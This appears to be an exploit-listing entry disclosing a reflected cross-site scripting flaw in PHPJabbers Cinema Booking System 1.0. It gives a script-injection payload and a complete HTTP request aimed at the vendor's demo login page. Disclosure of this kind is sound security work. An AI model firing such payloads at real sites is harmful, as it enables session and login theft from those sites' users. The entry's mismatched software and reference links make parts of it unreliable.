## https://sploitus.com/exploit?id=PACKETSTORM:174514
## Title: Cinema Booking System-1.0 XSS-Reflected
## Author: nu11secur1ty
## Date: 09/05/2023
## Vendor: https://www.phpjabbers.com/
## Software: https://www.phpjabbers.com/car-rental-script/
## Reference: https://portswigger.net/web-security/sql-injection
## Description:
The name of an arbitrarily supplied URL parameter is copied into the
value of an HTML tag attribute which is encapsulated in double
quotation marks. The payload kfimq"><script>alert(1)</script>k0a57 was
submitted in the name of an arbitrarily supplied URL parameter. This
input was echoed unmodified in the application's response. The
attacker can trick all users of this system into visiting a very
DANGEROUS URL address, and the worst thing is when they try to log in
to this system, by using his malicious link!
STATUS: HIGH-CRITICAL Vulnerability
[+]Testing Payload:
```
GET /1693939439_790/index.php/kfimq"><script>alert(1)</script>k0a57?controller=pjAdmin&action=pjActionLogin
HTTP/1.1
Host: demo.phpjabbers.com
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.5845.141
Safari/537.36
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="116", "Chromium";v="116"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
```
## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/phpjabbers/2023/Cinema-Booking-System-1.0%20)
## Proof and Exploit:
[href](https://www.nu11secur1ty.com/2023/09/cinema-booking-system-10-xss-reflected.html)
## Time spent:
00:17:00